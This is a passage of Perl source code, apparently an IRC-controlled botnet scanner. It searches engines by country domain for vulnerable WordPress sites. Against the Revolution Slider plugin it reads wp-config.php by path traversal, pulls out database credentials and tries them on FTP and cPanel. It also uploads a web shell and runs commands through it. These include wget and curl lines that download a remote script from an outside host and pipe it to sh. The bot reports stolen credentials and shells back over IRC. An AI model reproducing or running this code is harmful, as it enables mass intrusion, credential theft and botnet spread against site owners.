  723. if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAU",$type,$nick); } exit; } }
  724. if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAT",$type,$nick); } exit; } }
  725. if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKJP",$type,$nick); } exit; } }
  726. if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKSE",$type,$nick); } exit; } }
  727. if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKMX",$type,$nick); } exit; } }
  728. if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNO",$type,$nick); } exit; } }
  729. if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDK",$type,$nick); } exit; } }
  730. }
  731.  
  732. ######################################### Exploiting
  733.  
  734. sub revslider() {
  735. my $chan = $_[0];
  736. my $bug = $_[1];
  737. my $dork = $_[2];
  738. my $engine = $_[3];
  739. my $nick = $_[4];
  740. my $count = 0;
  741. my @list = &search_engine($chan,$bug,$dork,$engine,$searchlogo,$nick);
  742. my $num = scalar(@list);
  743. if ($num > 0){
  744. foreach my $site(@list){
  745. $count++;
  746.  
  747. my $test = "http://".$site."wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  748. my $re = &get_content($test);
  749. if ($re =~ /http:\/\//){
  750. &sql_xpl($test,$dork,$chan,$site,$engine,$rsqllogo,$nick);
  751. &upload($site,$dork,$chan,$engine,$revlogo,$nick); sleep(2);
  752. }
  753. if ($count == $num-1) {
  754. &msg("$chan","$searchlogo(7@2$engine15) 14Selesai");
  755. if ($engine =~ /eMeL/) {
  756. &sendraw("mode $chan -m");
  757. &msg("$chan","4- Advertising- 0,12 Add me on 9,5YM: addanaliaas");
  758. &msg("$chan","$searchlogo 0Capek kali bah.. tunggu la 5 menit lg ya baru scan lg, kl ga taik itu la makani, bujang!!!");
  759. }
  760. }
  761. }
  762. }
  763. }
  764. sub sql_xpl() {
  765. my $url = $_[0];
  766. my $dork = $_[1];
  767. my $chan = $_[2];
  768. my $site = $_[3];
  769. my $engine = $_[4];
  770. my $logo = $_[5];
  771. my $nick = $_[6];
  772. my $data = &get_content($url);
  773. my $psite = "http://".$site;
  774. if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; }
  775. if ($data =~ /DB_NAME/) {
  776. my $db = ""; my $user = ""; my $pass = ""; my $dbhost = "";
  777. if ($data =~ m/'DB_NAME', '(.*)'/g) { $db = $1; }
  778. if ($data =~ m/'DB_USER', '(.*)'/g) { $user = $1; }
  779. if ($data =~ m/'DB_PASSWORD', '(.*)'/g) { $pass = $1; }
  780. if ($data =~ m/'DB_HOST', '(.*)'/g) { $dbhost = $1; }
  781. &msg("$chan","$logo(7@2$engine15) 4Database 5[Name: $db] [Host: $dbhost] [User : $user] [Pass : $pass]");
  782. &msg("$chan","$logo(7@2$engine15) 13Shell uploading...");
  783. &msg("$chan","$logo(7@2$engine15) 13FTP trying...");
  784. &msg("$chan","$logo(7@2$engine15) 13cPanel trying...");
  785. &ftp_connect($host,$dork,$user,$pass,$chan,$engine,$logo,$nick); sleep(2);
  786. &cp_connect($host,$dork,$user,$pass,$chan,$engine,$logo); sleep(2);
  787. }
  788. }
  789.  
  790. sub ftp_connect() {
  791. my $host = $_[0];
  792. my $dork = $_[1];
  793. my $user = $_[2];
  794. my $pass = $_[3];
  795. my $chan = $_[4];
  796. my $engine = $_[5];
  797. my $logo = $_[6];
  798. my $nick = $_[7];
  799. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  800. my $success = 1;
  801. use Net::FTP;
  802. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
  803. $success = 0 if $ftp->login($user,$pass);
  804. $ftp->quit;
  805. if ($success == 0) {
  806. &msg("$chan","$logo(7@2$engine15) 4FTP Connected!  5Sent To $nick ");
  807. if ($nick eq $admin) {
  808. &msg("$admin","$logo(7@2$engine15) 4FTP Connected 15( 12ftp://".$host." 6".$user." 13:6 ".$pass." 15) 14Dork: $dork");
  809. } else {
  810. &msg("$nick","$logo(7@2$engine15) 4FTP Connected 15( 12ftp://".$host." 6".$user." 13:6 ".$pass." 15) 14Dork: $dork");
  811. &msg("$admin","$logo(7@2$engine15) 4FTP Connected 15( 12ftp://".$host." 6".$user." 13:6 ".$pass." 15) 14Dork: $dork 15by: $nick");
  812. }
  813. }
  814. } exit;
  815. }
  816. }
  817.  
  818. sub cp_connect() {
  819. my $host = $_[0];
  820. my $dork = $_[1];
  821. my $user = $_[2];
  822. my $pass = $_[3];
  823. my $chan = $_[4];
  824. my $engine = $_[5];
  825. my $logo = $_[6];
  826.  
  827. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  828. my $cp = "ftp://$user:$pass@".$host."";
  829. my $cpanel = &get_content($cp);
  830. if ($cpanel =~ /ftp/){
  831. &msg("$chan","$logo(7@2$engine15) 4cPanel Connected!");
  832. if ($nick eq $admin) {
  833. &msg("$admin","$logo(7@2$engine15) 4cPanel Connected 15( 2".$host."/controlpanel 7".$user." 13:7 ".$pass." 15) 14Dork: $dork");
  834. } else {
  835. #&msg("$nick","$logo(7@2$engine15) 4cPanel Connected 15( 2".$host."/controlpanel 7".$user." 13:7 ".$pass." 15) 14Dork: $dork");
  836. &msg("$admin","$logo(7@2$engine15) 4cPanel Connected 15( 2".$host."/controlpanel 7".$user." 13:7 ".$pass." 15) 14Dork: $dork 15by: $nick");
  837. }
  838. }
  839. } exit;
  840. }
  841. }
  842.  
  843. sub upload() {
  844. my $url = $_[0];
  845. my $dork = $_[1];
  846. my $chan = $_[2];
  847. my $engine = $_[3];
  848. my $logo = $_[4];
  849. my $nick = $_[5];
  850. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  851. my $vuln = "http://".$url."wp-admin/admin-ajax.php";
  852. my $manual = "http://".$url."wp-content/plugins/revslider/temp/update_extract/revslider.zip;unzip revslider.zip";
  853. my $shell = "http://".$url."wp-content/plugins/revslider/temp/update_extract/revslider/joss.php";
  854. my $pbots = "http://".$url."wp-content/plugins/revslider/temp/update_extract/revslider/pbot.php";
  855. my $uan = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  856. $uan->timeout(10);
  857. $uan->agent($useragent);
  858. my $status = $uan->get("$vuln");
  859.  
  860. my $exploit = $uan->post("$vuln", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  861. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
  862. &msg("$chan","$logo(7@2$engine15) 14Payload successfully executed ");
  863. my $unzip = &get_content($manual);
  864. sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
  865. my $rndstr = rndstr(8, 1..9, 'a'..'z');
  866. my $cmd1 = encode_base64("echo $rndstr");
  867. my $status = $uan->get("$shell?cmd=$cmd1");
  868. if ($status->decoded_content =~ /system\(\) has been disabled/) {
  869. &msg("$chan","$logo(7@2$engine15) 14Xploit failed: system() has been disabled");exit;
  870. }elsif ($status->decoded_content !~ /$rndstr/) {
  871. &msg("$chan","$logo(7@2$engine15) 6Xploit success: " . $status->status_line . "");
  872.  
  873. my $target = &get_content($shell."?bajak");
  874. if ($target =~ /SexCrime - Shell/i) {
  875. &os($shell,$chan,$dork,$engine,$logo,$nick,$url);
  876. }
  877. if ($spread == 1) { &get_content($pbots,2); }
  878.  
  879. }
  880. }
  881. elsif ($exploit->decoded_content =~ /Wrong request/) {&msg("$chan","$logo(7@2$engine15) 14Payload failed: Not vulnerable ");exit;}
  882. elsif ($exploit->decoded_content =~ m/0$/) {&msg("$chan","$logo(7@2$engine15) 14Payload failed: Plugin unavailable ");exit;}
  883. #else {$exploit->decoded_content =~ /<\/b>(.*?)<br>/; &msg("$chan","$logo(7@2$engine15) 14Payload failed: $1 ");exit;}
  884.  
  885. }exit;
  886. }
  887. }
  888.  
  889. sub os() {
  890. my $url = $_[0];
  891. my $chan = $_[1];
  892. my $dork = $_[2];
  893. my $engine = $_[3];
  894. my $logo = $_[4];
  895. my $nick = $_[5];
  896. my $url2 = $_[6];
  897. my @print;
  898. my $target = &get_content($url."?bajak");
  899. if ($target =~ m/Shell : Bispak/) {
  900. my $target = &get_content($url."?cmd=".$c99.$botxx,7);
  901. my $target = &get_content($url."bot.php");
  902. my $target = &get_content($url."?cmd=wget%20-qO%20-%20http://www.viverosgimeno.es/wp-content/rac/bss.txt%20|%20sh%20>%20/dev/null%202>&1%20&");
  903. my $target = &get_content($url."?cmd=wget%20-qO%20-%20http://www.viverosgimeno.es/wp-content/rac/bss.txt%20|%20sh%20>%20/dev/null%202>&1%20&");
  904. my $target = &get_content($url."?cmd=curl%20http://www.viverosgimeno.es/wp-content/rac/bss.txt%20|%20sh%20>%20/dev/null%202>&1%20&");
  905. my $target = &get_content($url."?cmd=curl%20http://www.viverosgimeno.es/wp-content/rac/bss.txt%20|%20sh%20>%20/dev/null%202>&1%20&");
  906. my $target = &get_content($url."?hta");
  907. my $safe = ""; my $os = ""; my $uid = "";
  908. if ($target =~ m/Shell : (.*?)<\/b>/){$safe=$1;}
  909. if ($target =~ m/Sistem : (.*?)<\/b>/){$os=$1;}
  910. if ($target =~ m/id=(.*?)grup=(.*?)/){$uid=$1;}
  911. &msg("$chan","$logo(7@2$engine15) 4Exploited! Shell $safe 5Sent To $nick 3$os 7Pengguna= $uid ");
  912. if ($nick eq $admin) {
  913. &msg("$admin","$logo(7@2$engine15) 4Shell $safe 12".$url." 3$os 7Pengguna=$uid 14Dork: $dork");
  914. } else {
  915. &msg("$nick","$logo(7@2$engine15) 4Shell $safe 12".$url." 3$os 7Pengguna=$uid 14Dork: $dork");
  916. &msg("$admin","$logo(7@2$engine15) 4Shell $safe 12".$url." 3$os 7Pengguna=$uid 14Dork: $dork 15by: $nick");
  917. }
  918. }
  919. my $c99shell = "http://".$url2."wp-includes/log.php";
  920. my $cgiperl = "http://".$url2."wp-indeks.php";
  921. my $cekc99 = &get_content($c99shell,7);
  922. my $cekcgi = &get_content($cgiperl,7);
  923.  
  924. if ($cekc99 =~ /Password:/) {
  925. if ($pubscan == 0) {
  926. &msg("$admin","$logo(7@2$engine15) 4<9=4>4 c99 4<9=4>12 $c99shell15 ");
  927. }
  928. }
  929. if ($cekcgi =~ /SexCrime - Shell/) {
  930. if ($pubscan == 0) {
  931. &msg("$admin","$logo(7@2$engine15) 4<9=4>4 Backup 4<9=4>11 $cgiperl15 ");
  932. }
  933. }
  934. if ($target =~ m/Shell : Kontol/) {
  935. &msg("$chan","$logo(7@2$engine15) 4Shell Kontol 12".$url."");
  936. }
  937.  
  938. return @print;
  939. }
  940.  
  941. ######################################### Searching site...
  942.  
  943. sub search_engine() {
  944. my (@total,@clean);
  945. my $chan = $_[0];
  946. my $bug = $_[1];
  947. my $dork = $_[2];
  948. my $engine = $_[3];
  949. my $logo = $_[4];
  950. if ($engine eq "UAE") { my @uae = jack1($dork."+site:ae"); push(@total,@uae); }
  951. if ($engine eq "Myanmar") { my @myanmar = jack2($dork."+site:mm"); push(@total,@myanmar); }
  952. if ($engine eq "Argentina") { my @argentina = jack3($dork."+site:ar"); push(@total,@argentina); }
  953. if ($engine eq "Austria") { my @austria = jack4($dork."+site:at"); push(@total,@austria); }
  954. if ($engine eq "Australia") { my @australia = jack5($dork."+site:au"); push(@total,@australia); }
  955. if ($engine eq "Brazil") { my @brazil = jack6($dork."+site:br"); push(@total,@brazil); }
  956. if ($engine eq "Canada") { my @canada = jack7($dork."+site:ca"); push(@total,@canada); }
  957. if ($engine eq "Chili") { my @chili = jack8($dork."+site:cl"); push(@total,@chili); }
  958. if ($engine eq "Cina") { my @cina = jack9($dork."+site:cn"); push(@total,@cina); }
  959. if ($engine eq "CoMersil") { my @comersil = jack10($dork."+site:com"); push(@total,@comersil); }
  960. if ($engine eq "Czech") { my @czech = jack11($dork."+site:cz"); push(@total,@czech); }
  961. if ($engine eq "Germany") { my @germany = jack12($dork."+site:de"); push(@total,@germany); }
  962. if ($engine eq "Denmark") { my @denmark = jack13($dork."+site:dk"); push(@total,@denmark); }
  963. if ($engine eq "Spain") { my @spain = jack14($dork."+site:es"); push(@total,@spain); }
  964. if ($engine eq "Europe") { my @europe = jack15($dork."+site:eu"); push(@total,@europe); }
  965. if ($engine eq "France") { my @france = jack16($dork."+site:fr"); push(@total,@france); }
  966. if ($engine eq "Hungary") { my @hungary = jack17($dork."+site:hu"); push(@total,@hungary); }
  967. if ($engine eq "Indonesia") { my @indonesia = jack18($dork."+site:id"); push(@total,@indonesia); }
  968. if ($engine eq "Israel") { my @israel = jack19($dork."+site:il"); push(@total,@israel); }
  969. if ($engine eq "India") { my @india = jack20($dork."+site:in"); push(@total,@india); }
  970. if ($engine eq "Info") { my @info = jack1($dork."+site:info"); push(@total,@info); }
  971. if ($engine eq "Iran") { my @iran = jack2($dork."+site:ir"); push(@total,@iran); }
  972. if ($engine eq "Italy") { my @italy = jack3($dork."+site:it"); push(@total,@italy); }
  973. if ($engine eq "Japan") { my @japan = jack4($dork."+site:jp"); push(@total,@japan); }
  974. if ($engine eq "Korea") { my @korea = jack5($dork."+site:kr"); push(@total,@korea); }
  975. if ($engine eq "Mexico") { my @mexico = jack6($dork."+site:mx"); push(@total,@mexico); }
  976. if ($engine eq "Malaysia") { my @malaysia = jack7($dork."+site:my"); push(@total,@malaysia); }
  977. if ($engine eq "Network") { my @network = jack8($dork."+site:net"); push(@total,@network); }
  978. if ($engine eq "Netherlands") { my @netherlands = jack9($dork."+site:nl"); push(@total,@netherlands); }
  979. if ($engine eq "Organization") { my @organization = jack10($dork."+site:org"); push(@total,@organization); }
  980. if ($engine eq "Philippines") { my @philippines = jack11($dork."+site:ph"); push(@total,@philippines); }
  981. if ($engine eq "Poland") { my @poland = jack12($dork."+site:pl"); push(@total,@poland); }
  982. if ($engine eq "Romania") { my @romania = jack13($dork."+site:ro"); push(@total,@romania); }
  983. if ($engine eq "Russian") { my @russian = jack14($dork."+site:ru"); push(@total,@russian); }
  984. if ($engine eq "Thailand") { my @thailand = jack14($dork."+site:th"); push(@total,@thailand); }
  985. if ($engine eq "Ukraine") { my @ukraine = jack16($dork."+site:ua"); push(@total,@ukraine); }
  986. if ($engine eq "England") { my @england = jack17($dork."+site:uk"); push(@total,@england); }
  987. if ($engine eq "USA") { my @usa = jack18($dork."+site:us"); push(@total,@usa); }
  988. if ($engine eq "Slovenia") { my @slovenia = jack19($dork."+site:si"); push(@total,@slovenia); }
  989. if ($engine eq "Belgium") { my @belgium = jack20($dork."+site:be"); push(@total,@belgium); }
  990. if ($engine eq "Bussines") { my @bussines = jack1($dork."+site:biz"); push(@total,@bussines); }
  991. if ($engine eq "SouthAfrica") { my @southafrica = jack2($dork."+site:za"); push(@total,@southafrica); }
  992. if ($engine eq "Vietnam") { my @vietnam = jack3($dork."+site:vn"); push(@total,@vietnam); }
  993. if ($engine eq "Tuvalu") { my @tuvalu = jack4($dork."+site:tv"); push(@total,@tuvalu); }
  994. if ($engine eq "Cocos") { my @cocos = jack5($dork."+site:cc"); push(@total,@cocos); }
  995. if ($engine eq "Turky") { my @turky = jack6($dork."+site:tr"); push(@total,@turky); }
  996. if ($engine eq "Asia") { my @asia = jack7($dork."+site:asia"); push(@total,@asia); }
  997. if ($engine eq "Serbia") { my @serbia = jack8($dork."+site:rs"); push(@total,@serbia); }
  998. if ($engine eq "Singapore") { my @singapore = jack9($dork."+site:sg"); push(@total,@singapore); }
  999. if ($engine eq "Taiwan") { my @taiwan = jack10($dork."+site:tw"); push(@total,@taiwan); }
  1000. if ($engine eq "Sweden") { my @sweden = jack11($dork."+site:se"); push(@total,@sweden); }
  1001. if ($engine eq "Pakistan") { my @pakistan = jack12($dork."+site:pk"); push(@total,@pakistan); }
  1002. if ($engine eq "Norway") { my @normay = jack13($dork."+site:no"); push(@total,@norway); }
  1003. if ($engine eq "Montenegro") { my @montenegro = jack14($dork."+site:me"); push(@total,@montenegro); }
  1004. if ($engine eq "Greece") { my @greece = jack15($dork."+site:gr"); push(@total,@greece); }
  1005. if ($engine eq "Education") { my @education = jack16($dork."+site:edu"); push(@total,@education); }
  1006. if ($engine eq "Goverment") { my @goverment = jack17($dork."+site:gov"); push(@total,@goverment); }
  1007. if ($engine eq "Kazakhstan") { my @kazakhstan = jack18($dork."+site:kz"); push(@total,@kazakhstan); }
  1008. if ($engine eq "Afganistan") { my @afganistan = jack19($dork."+site:af"); push(@total,@afganistan); }
  1009. if ($engine eq "Albania") { my @albania = jack20($dork."+site:al"); push(@total,@albania); }
  1010. if ($engine eq "Algeria") { my @algeria = jack1($dork."+site:dz"); push(@total,@algeria); }
  1011. if ($engine eq "Angola") { my @angola = jack2($dork."+site:ao"); push(@total,@angola); }
  1012. if ($engine eq "Armenia") { my @armenia = jack3($dork."+site:am"); push(@total,@armenia); }
  1013. if ($engine eq "Azerbaijan") { my @azerbaijan = jack4($dork."+site:az"); push(@total,@azerbaijan); }
  1014. if ($engine eq "Bahrain") { my @bahrain = jack5($dork."+site:bh"); push(@total,@bahrain); }
  1015. if ($engine eq "Bangladesh") { my @bangladesh = jack6($dork."+site:bd"); push(@total,@bangladesh); }
  1016. if ($engine eq "Belarus") { my @belarus = jack7($dork."+site:by"); push(@total,@belarus); }
  1017. if ($engine eq "Bhutan") { my @bhutan = jack8($dork."+site:bt"); push(@total,@bhutan); }
  1018. if ($engine eq "Bolivia") { my @bolivia = jack9($dork."+site:bo"); push(@total,@bolivia); }
  1019. if ($engine eq "Bosnia") { my @bosnia = jack10($dork."+site:ba"); push(@total,@bosnia); }
  1020. if ($engine eq "Bulgaria") { my @bulgaria = jack12($dork."+site:bg"); push(@total,@bulgaria); }
  1021. if ($engine eq "Brunei") { my @brunei = jack13($dork."+site:bn"); push(@total,@brunei); }
  1022. if ($engine eq "Cambodia") { my @cambodia = jack14($dork."+site:kh"); push(@total,@cambodia); }
  1023. if ($engine eq "Cameroon") { my @cameroon = jack11($dork."+site:cm"); push(@total,@cameroon); }
  1024. if ($engine eq "Christmas") { my @christmas = jack15($dork."+site:cx"); push(@total,@christmas); }
  1025. if ($engine eq "CostaRika") { my @costarika = jack16($dork."+site:cr"); push(@total,@costarika); }
  1026. if ($engine eq "Croatia") { my @croatia = jack17($dork."+site:hr"); push(@total,@croatia); }
  1027. if ($engine eq "Cuba") { my @cuba = jack18($dork."+site:cu"); push(@total,@cuba); }
  1028. if ($engine eq "Cyprus") { my @cyprus = jack19($dork."+site:cy"); push(@total,@cyprus); }
  1029. if ($engine eq "Dominican") { my @dominican = jack20($dork."+site:dm"); push(@total,@dominican); }
  1030. if ($engine eq "Equador") { my @equador = jack1($dork."+site:ec"); push(@total,@equador); }
  1031. if ($engine eq "Egypt") { my @egypt = jack2($dork."+site:eg"); push(@total,@egypt); }
  1032. if ($engine eq "Estonia") { my @estonia = jack3($dork."+site:ee"); push(@total,@estonia); }
  1033. if ($engine eq "Finland") { my @finland = jack4($dork."+site:fi"); push(@total,@finland); }
  1034. if ($engine eq "Georgia") { my @georgia = jack5($dork."+site:ge"); push(@total,@georgia); }
  1035. if ($engine eq "Ghana") { my @ghana = jack6($dork."+site:gh"); push(@total,@ghana); }
  1036. if ($engine eq "Grenada") { my @grenada = jack7($dork."+site:gd"); push(@total,@grenada); }
  1037. if ($engine eq "Honduras") { my @honduras = jack8($dork."+site:hn"); push(@total,@honduras); }
  1038. if ($engine eq "Hongkong") { my @hongkong = jack9($dork."+site:hk"); push(@total,@hongkong); }
  1039. if ($engine eq "Iceland") { my @iceland = jack10($dork."+site:is"); push(@total,@iceland); }
  1040. if ($engine eq "Ireland") { my @ireland = jack12($dork."+site:ie"); push(@total,@ireland); }
  1041. if ($engine eq "Kenya") { my @kenya = jack13($dork."+site:ke"); push(@total,@kenya); }
  1042. if ($engine eq "Kuwait") { my @kuwait = jack14($dork."+site:kw"); push(@total,@kuwait); }
  1043. if ($engine eq "Laos") { my @laos = jack16($dork."+site:la"); push(@total,@laos); }
  1044. if ($engine eq "Latvia") { my @latvia = jack17($dork."+site:lv"); push(@total,@latvia); }
  1045. if ($engine eq "Liberia") { my @liberia = jack18($dork."+site:lr"); push(@total,@liberia); }
  1046. if ($engine eq "Libyan") { my @libyan = jack19($dork."+site:ly"); push(@total,@libyan); }
  1047. if ($engine eq "Lithuania") { my @lithuania = jack11($dork."+site:lt"); push(@total,@lithuania); }
  1048. if ($engine eq "Macedonia") { my @macedonia = jack15($dork."+site:mk"); push(@total,@macedonia); }
  1049. if ($engine eq "Malta") { my @malta = jack1($dork."+site:mt"); push(@total,@malta); }
  1050. if ($engine eq "Mongolia") { my @mongolia = jack2($dork."+site:mn"); push(@total,@mongolia); }
  1051. if ($engine eq "Mozambique") { my @mozambique = jack3($dork."+site:mz"); push(@total,@mozambique); }
  1052. if ($engine eq "Namibia") { my @namibia = jack4($dork."+site:na"); push(@total,@namibia); }
  1053. if ($engine eq "Nauru") { my @nauru = jack6($dork."+site:nr"); push(@total,@nauru); }
  1054. if ($engine eq "Nepal") { my @nepal = jack7($dork."+site:np"); push(@total,@nepal); }
  1055. if ($engine eq "NewZealand") { my @newzealand = jack8($dork."+site:nz"); push(@total,@newzealand); }
  1056. if ($engine eq "Nigeria") { my @nigeria = jack9($dork."+site:ng"); push(@total,@nigeria); }
  1057. if ($engine eq "Paraguay") { my @paraguay = jack10($dork."+site:py"); push(@total,@paraguay); }
  1058. if ($engine eq "Peru") { my @peru = jack5($dork."+site:pe"); push(@total,@peru); }
  1059. if ($engine eq "Portugal") { my @portugal = jack11($dork."+site:pt"); push(@total,@portugal); }
  1060. if ($engine eq "PuertoRico") { my @puertorico = jack12($dork."+site:pr"); push(@total,@puertorico); }
  1061. if ($engine eq "Qatar") { my @qatar = jack13($dork."+site:qa"); push(@total,@qatar); }
  1062. if ($engine eq "SaintLucia") { my @saintlucia = jack14($dork."+site:lc"); push(@total,@saintlucia); }
  1063. if ($engine eq "Samoa") { my @samoa = jack15($dork."+site:ws"); push(@total,@samoa); }
  1064. if ($engine eq "SaudiArabia") { my @saudiarabia = jack17($dork."+site:sa"); push(@total,@saudiarabia); }
  1065. if ($engine eq "Senegal") { my @senegal = jack18($dork."+site:sn"); push(@total,@senegal); }
  1066. if ($engine eq "Slovakia") { my @slovakia = jack16($dork."+site:sk"); push(@total,@slovakia); }
  1067. if ($engine eq "Srilanka") { my @srilanka = jack19($dork."+site:lk"); push(@total,@srilanka); }
  1068. if ($engine eq "Swaziland") { my @swaziland = jack20($dork."+site:sz"); push(@total,@swaziland); }
  1069. if ($engine eq "Tajikistan") { my @tajikistan = jack1($dork."+site:tj"); push(@total,@tajikistan); }
  1070. if ($engine eq "Tanzania") { my @tanzania = jack2($dork."+site:tz"); push(@total,@tanzania); }
  1071. if ($engine eq "Tokelau") { my @tokelau = jack3($dork."+site:tk"); push(@total,@tokelau); }
  1072. if ($engine eq "Tonga") { my @tonga = jack4($dork."+site:to"); push(@total,@tonga); }
  1073. if ($engine eq "Tunisia") { my @tunisia = jack5($dork."+site:tn"); push(@total,@tunisia); }
  1074. if ($engine eq "Uruguay") { my @uruguay = jack6($dork."+site:uy"); push(@total,@uruguay); }
  1075. if ($engine eq "Uzbekistan") { my @uzbekistan = jack7($dork."+site:uz"); push(@total,@uzbekistan); }
  1076. if ($engine eq "Venezuela") { my @venezuela = jack8($dork."+site:ve"); push(@total,@venezuela); }
  1077. if ($engine eq "Yemen") { my @yemen = jack9($dork."+site:ye"); push(@total,@yemen); }
  1078. if ($engine eq "Yugoslavia") { my @yugoslavia = jack10($dork."+site:yu"); push(@total,@yugoslavia); }
  1079. if ($engine eq "Zambia") { my @zambia = jack11($dork."+site:zm"); push(@total,@zambia); }
  1080. if ($engine eq "Uganda") { my @uganda = jack12($dork."+site:ug"); push(@total,@uganda); }
  1081. if ($engine eq "Trinidad") { my @trinidad = jack13($dork."+site:tt"); push(@total,@trinidad); }
  1082. if ($engine eq "Zimbabwe") { my @zimbabwe = jack14($dork."+site:zw"); push(@total,@zimbabwe); }
  1083. if ($engine eq "KonToL") { my @kontol = kontol($dork); push(@total,@kontol); }
  1084. if ($engine eq "PePek") { my @pepek = pepek($dork); push(@total,@pepek); }
  1085. if ($engine eq "TeTek") { my @tetek = tetek($dork); push(@total,@tetek); }
  1086. if ($engine eq "ItiL") { my @itil = itil($dork); push(@total,@itil); }
  1087. if ($engine eq "NenNen") { my @nennen = nennen($dork); push(@total,@nennen); }
  1088. if ($engine eq "SuSu") { my @susu = susu($dork); push(@total,@susu); }
  1089. if ($engine eq "BuahDada") { my @buahdada = buahdada($dork); push(@total,@buahdada); }
  1090. if ($engine eq "PayuDara") { my @payudara = payudara($dork); push(@total,@payudara); }
  1091. if ($engine eq "Kentot") { my @kentot = kentot($dork); push(@total,@kentot); }
  1092. if ($engine eq "eMeL") { my @emel = emel($dork); push(@total,@emel); }
  1093. if ($engine eq "OraL") { my @oral = oral($dork); push(@total,@oral); }
  1094. if ($engine eq "Klitoris") { my @klitoris = klitoris($dork); push(@total,@klitoris); }
  1095. if ($engine eq "Masturbasi") { my @masturbasi = masturbasi($dork); push(@total,@masturbasi); }
  1096. if ($engine eq "Onani") { my @onani = onani($dork); push(@total,@onani); }
  1097. if ($engine eq "Sperma") { my @sperma = sperma($dork); push(@total,@sperma); }
  1098. if ($engine eq "AnaL") { my @anal = anal($dork); push(@total,@anal); }
  1099. if ($engine eq "Puting") { my @puting = puting($dork); push(@total,@puting); }
  1100. if ($engine eq "Vagina") { my @vagina = vagina($dork); push(@total,@vagina); }
  1101. if ($engine eq "Penis") { my @penis = penis($dork); push(@total,@penis); }
  1102. if ($engine eq "MeMek") { my @memek = memek($dork); push(@total,@memek); }
  1103. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
  1104. if ($engine eq "GooGLeCA") { my @googleCA = googleCA($dork); push(@total,@googleCA); }
  1105. if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@total,@googleDE); }
  1106. if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@total,@googleUK); }
  1107. if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@total,@googleFR); }
  1108. if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@total,@googleES); }
  1109. if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@total,@googleIT); }
  1110. if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@total,@googleNL); }
  1111. if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@total,@googleBE); }
  1112. if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); }
  1113. if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); }
  1114. if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@total,@googleDK); }
  1115. if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@total,@googleNO); }
  1116. if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@total,@googleNZ); }
  1117. if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@total,@googleIE); }
  1118. if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@total,@googleBR); }
  1119. if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@total,@googleAR); }
  1120. if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@total,@googleCO); }
  1121. if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@total,@googleCU); }
  1122. if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@total,@googleCL); }
  1123. if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@total,@googleMX); }
  1124. if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@total,@googleAU); }
  1125. if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@total,@googleRU); }
  1126. if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@total,@googleAT); }
  1127. if ($engine eq "GooGLePL") { my @googlePL = googlePL($dork); push(@total,@googlePL); }
  1128. if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@total,@googleIL); }
  1129. if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@total,@googleTR); }
  1130. if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@total,@googleUA); }
  1131. if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@total,@googleGR); }
  1132. if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@total,@googleJP); }
  1133. if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@total,@googleCN); }
  1134. if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@total,@googleMY); }
  1135. if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@total,@googleTH); }
  1136. if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@total,@googleIN); }
  1137. if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@total,@googleKR); }
